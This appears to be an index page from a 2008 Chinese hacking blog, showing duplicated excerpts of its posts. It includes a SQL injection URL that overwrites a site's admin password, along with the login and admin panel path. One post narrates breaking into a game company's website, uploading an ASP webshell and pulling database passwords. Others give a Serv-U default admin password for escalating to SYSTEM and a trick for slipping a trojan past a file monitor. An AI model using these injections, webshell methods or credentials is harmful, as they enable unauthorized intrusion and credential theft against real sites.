1.前提
服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去)
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启Read More...
非's Blog
夜,依然深邃
WebVOD 视频点播系统漏洞
[ At 2008-4-28 By admin 0 comments ]注入点:http://www.***.cn/webmedia/common/function/xtree.asp?id=1
直接updata密码:http://www.***.cn/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='bd69cacb3e83062b'%20where%20UserName='admin'
账号:admin密码:sshacker
后台地址:http://www.***.cn/webmedia/admin/login.aspRead More...
直接updata密码:http://www.***.cn/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='bd69cacb3e83062b'%20where%20UserName='admin'
账号:admin密码:sshacker
后台地址:http://www.***.cn/webmedia/admin/login.aspRead More...
Tags:
分类:漏洞利用 | 引用:0 | 浏览:
入侵韩国冒险岛官方网站
[ At 2008-4-28 By admin 0 comments ]来源:http://www.helpso.cn/blog/
1.打开入口点.打开冒险岛官方网站,发现全是.net的,注入发现没什么希望,于是将思维转到公司网站上去.经过浏览发现nexon是它的运营公司,neowiz是其开发公司(neowiz也属于nexon).因为nexon太过出名,直接从他下手成功的把握不大,于是乎从neowiz的公司网站http://www.wizet.com 下手.经观察检测,服务器采用asp+mssql+win2003组合,并且有sql注入 dbowner 权限,数据库和web还在同一服务器上.这样我们好办多了,首先我们用xiaolu的差异备份工具备份一个shell,后来发现这个shell有问题,根本连接不上.无语.因为该站有sql注入,所以我们注射得到管理员密码后,利用现成的工具nbsi把服务器的网站目录列出来,然后查找哪一个是后台管理目录.后来查找到http://www.wizet.com/hello/ 这个为后台.登陆进去,发表新闻,直接插入asp木马,上传成功.所得到的shell地址为:http://www.wizet.com/super/hello/press/press_listProc.asp
2.搜集有用的资料.经过一段时间的检查,该服务器上有很多web目录.里面的文件全是封装成dll的,我花了半个小时将服务器上web目录里所有的dll下载回来,利用.net反汇编工具 Reflector 打开,经过分析,这些web全部是管理后台,dll里有中国/台湾/泰国/英国 的冒险岛游戏服务器数据库密码(没有sa),但是有些密码已经过期.Read More...
1.打开入口点.打开冒险岛官方网站,发现全是.net的,注入发现没什么希望,于是将思维转到公司网站上去.经过浏览发现nexon是它的运营公司,neowiz是其开发公司(neowiz也属于nexon).因为nexon太过出名,直接从他下手成功的把握不大,于是乎从neowiz的公司网站http://www.wizet.com 下手.经观察检测,服务器采用asp+mssql+win2003组合,并且有sql注入 dbowner 权限,数据库和web还在同一服务器上.这样我们好办多了,首先我们用xiaolu的差异备份工具备份一个shell,后来发现这个shell有问题,根本连接不上.无语.因为该站有sql注入,所以我们注射得到管理员密码后,利用现成的工具nbsi把服务器的网站目录列出来,然后查找哪一个是后台管理目录.后来查找到http://www.wizet.com/hello/ 这个为后台.登陆进去,发表新闻,直接插入asp木马,上传成功.所得到的shell地址为:http://www.wizet.com/super/hello/press/press_listProc.asp
2.搜集有用的资料.经过一段时间的检查,该服务器上有很多web目录.里面的文件全是封装成dll的,我花了半个小时将服务器上web目录里所有的dll下载回来,利用.net反汇编工具 Reflector 打开,经过分析,这些web全部是管理后台,dll里有中国/台湾/泰国/英国 的冒险岛游戏服务器数据库密码(没有sa),但是有些密码已经过期.Read More...
Tags:
分类:技术文章 | 引用:0 | 浏览:
防止黑客根据PHP中的错误信息爆路径
[ At 2008-4-27 By admin 0 comments ]在默认的环境下.php.ini中配置错误消息有几种:
Php.ini 将能够显示的错误类型分为如下种类。
; E_ALL -所有的错误和警告,(不包含E_STRICT).
; E_ERROR -致命的运行时错误
; E_RECOVERABLE_ERROR -可由异常处理机制所捕捉 (catch/handle) 的错误Read More...
Php.ini 将能够显示的错误类型分为如下种类。
; E_ALL -所有的错误和警告,(不包含E_STRICT).
; E_ERROR -致命的运行时错误
; E_RECOVERABLE_ERROR -可由异常处理机制所捕捉 (catch/handle) 的错误Read More...
Tags:
分类:站长知识 | 引用:0 | 浏览:
Serv-u6.0提权新玩法
[ At 2008-4-27 By admin 0 comments ]From:老邪的博客
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U 的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用 MSWinsock.Winsock建立一个连接,并且以System权限添加超级用户,代码如下: Read More...
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U 的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用 MSWinsock.Winsock建立一个连接,并且以System权限添加超级用户,代码如下: Read More...
Tags: 渗透提权
分类:技术文章 | 引用:0 | 浏览:
OBlog Sql Injection Vulnerability
[ At 2008-4-27 By admin 0 comments ]官方已经修正该漏洞。
#Author: Whytt & Tr4c3[at]126[dot]com
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.aspRead More...
#Author: Whytt & Tr4c3[at]126[dot]com
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.aspRead More...
Tags:
分类:漏洞利用 | 引用:0 | 浏览:
突破一流信息监控系统实现文件“上传”
[ At 2008-4-26 By admin 0 comments ]以前遇到过这种情况,今天看到就转过来了
在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件Read More...
在我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件Read More...
Tags: 技巧
分类:技术文章 | 引用:0 | 浏览:
安全检测纵横时空文学网
[ At 2008-4-26 By admin 0 comments ]by:伤心的鱼
笔者日前接到朋友的邀请,要求对其管理的网站进行一次安全检测,以便查找出问题的所在及时修补漏洞。另外朋友还说网站是新架设上去的,要求细致查找漏洞。笔者在朋友的极力邀请之下开始了这次安全检测之旅。
首先打开朋友发来的网站 地址为http://xxx.ouou.com/,是ouou网站下属的一个文学小说的网站。叫做纵横时空文学站。 界面做的非常漂亮. 初步看了下为PHP+MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P+M+U的架构了 也就是PHP+MYSQL+UNIX 。 可能有读者会问了 ? 你怎么知道他的Apache跟MYSQL的版本呢? 其实这个很简单。 在WEB随便输入一个不存在的页面 看下暴错信息就OK了。 如图1
Read More...
笔者日前接到朋友的邀请,要求对其管理的网站进行一次安全检测,以便查找出问题的所在及时修补漏洞。另外朋友还说网站是新架设上去的,要求细致查找漏洞。笔者在朋友的极力邀请之下开始了这次安全检测之旅。
首先打开朋友发来的网站 地址为http://xxx.ouou.com/,是ouou网站下属的一个文学小说的网站。叫做纵横时空文学站。 界面做的非常漂亮. 初步看了下为PHP+MYSQL的架构PHP版本为PHP/5.1.4-0.1. 。WEBSERVER使用的是Apache/2.0.55 基于以上几点应该大概能判断出服务器应该是使用的UNIX . 这种架构应该为典型的P+M+U的架构了 也就是PHP+MYSQL+UNIX 。 可能有读者会问了 ? 你怎么知道他的Apache跟MYSQL的版本呢? 其实这个很简单。 在WEB随便输入一个不存在的页面 看下暴错信息就OK了。 如图1
Read More...
